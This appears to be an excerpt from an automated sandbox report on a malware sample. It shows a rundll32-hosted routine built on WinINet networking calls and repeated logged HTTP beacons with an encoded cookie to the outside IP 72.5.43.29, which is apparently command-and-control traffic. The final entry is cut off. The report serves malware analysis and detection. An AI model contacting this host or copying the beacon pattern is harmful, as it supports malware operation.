Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11501F20 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcscpy,wcscat,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_00007FFE11501F20
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2